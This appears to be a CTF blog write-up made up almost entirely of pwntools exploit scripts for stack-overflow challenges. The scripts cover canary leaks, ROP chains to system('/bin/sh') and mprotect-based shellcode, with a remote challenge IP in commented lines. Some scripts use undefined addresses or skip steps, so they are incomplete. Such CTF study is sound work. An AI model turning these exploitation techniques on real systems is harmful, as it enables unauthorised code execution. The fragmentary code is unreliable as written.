# p = process('/home/nop/Desktop/babystack') p = remote('149.129.103.121',10001)
payload = 'A'*0x88 + 'B'# 'B' cover the canary lower 8 bit
p.recv() p.send('1') # choice 1 option to input payload p.send(payload) sleep(0.1) p.send('2') # choice 2 option to get the value of canary p.recvuntil('B') # when get character 'B', store the value canary = u64('\x00'+p.recv(7)) # add the lower 8 bit('\x00') log.info('canary = %#x',canary)
p.recv() # read the trash data p.send('1') # choice 1 option to couse stack overflow
p.recvuntil('please input your name\n') p.send('nop') # whatever just input p.recvuntil("Let's start a game,can you guess the key?\n")
payload = 'A'*40 payload += p64(pop_rdi) payload += p64(read_got) # transfer the read@got to function puts payload += p64(puts_plt) # call th function puts payload += p64(start) # set the return address,make process restart
p.send('nop') # whatever just input p.recvuntil("Let's start a game,can you guess the key?\n")
payload1 = 'A'*40 payload1 += p64(pop_rdi) # ransfer the binsh_addr to function puts payload1 += p64(binsh_addr) payload1 += p64(system_addr) # call system payload1 += p64(start) # put the return address,could put aything of course
p.send(payload1) sleep(3) p.interactive()
pwn test
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
from pwn import *
p = process('./pwn1') # p = process('149.129.103.121',10005) elf = ELF('./pwn1') scanf_plt = elf.symbols['__isoc99_scanf'] system_plt = elf.symbols['system'] format_addr=0x08048629 bin_sh = 0x804a044
payload = 'A'*0x48 payload += p64(pop_rdi) # transfer the read@got to puts payload += p64(read_got) payload += p64(puts_plt) # call puts payload += p64(start) # set the return address payload = payload.ljust(200,'B') # pading the length of paylaod to 200
print'sending payload...' for i in range(200): p.send(payload[i]) if i==199: print"work done!" sleep(0.1) p.recvuntil("bye~\n") read_addr = u64(p.recv()[:6].ljust(8,'\x00')) log.info("read_addr = %#x",read_addr)
payload1 = 'A'*0x48 payload1 += p64(pop_rdi) # transfer the binsh_addr to system payload1 += p64(binsh_addr) payload1 += p64(system_addr) # call system to get shell payload1 += p64(start) # set the return address payload1 = payload1.ljust(200,'B')
print'sending payload...' for i in range(200): p.send(payload1[i]) if i==199: print"work done!" sleep(0.1)
from pwn import * from base64 import b64encode context.arch='amd64'
# the program was complied staticlly, there are not system or the syscall number of execve, # but we could change some segiment's policy to write shellcode and execute, this way could get shell locally, # I could not connect to the server, so I don't konw if it's work on server yet.
p = process('../Desktop/syscall') # p = remote('149.129.103.121',10009) elf = ELF('../Desktop/syscall',checksec=False)
main = elf.sym['main'] mprotect_addr = elf.sym['mprotect'] read_addr = elf.sym['read']
pop_rdx_rsi = 0x0000000000443409# pop rdx ; pop rsi ; ret pop_rdi = 0x0000000000401e36# pop rdi ; ret shellcode_addr = 0x00000000006CA000 shellcode = asm(shellcraft.sh())
# leak the value of canary p.recvuntil(">") p.sendline(b64encode('A'*8+'B')) # cover the canary lowest byte,to leak it p.recvuntil("B") canary = u64('\x00'+p.recv(7)) log.success('canary = %#x',canary)
# change the policy which start at 0x00000000006CA000 and end at 0x00000000006CA000+len(shellcode) payload = 'A'*0x8 + p64(canary) + 'A'*0x8 payload += flat([ pop_rdx_rsi, 0x7, len(shellcode), pop_rdi, shellcode_addr, mprotect_addr, main ]) p.sendline(b64encode(payload))
p.recvuntil("continue ?") # end the circulation to make stack overflow p.sendline('no') sleep(1)
# write shellcode to address 0f 0x00000000006CA000 and execute it p.recvuntil(">") payload = 'A'*0x8 + p64(canary) + 'A'*0x8 payload += flat([ pop_rdx_rsi, len(shellcode), shellcode_addr, pop_rdi, 0, read_addr, shellcode_addr ]) p.sendline(b64encode(payload))
p.recvuntil("continue ?") # end the circulation to make stack overflow p.sendline('no') sleep(1)
You are welcome to share this blog, so that more people can participate in it. If the images used in the blog infringe your copyright, please contact the author to delete them.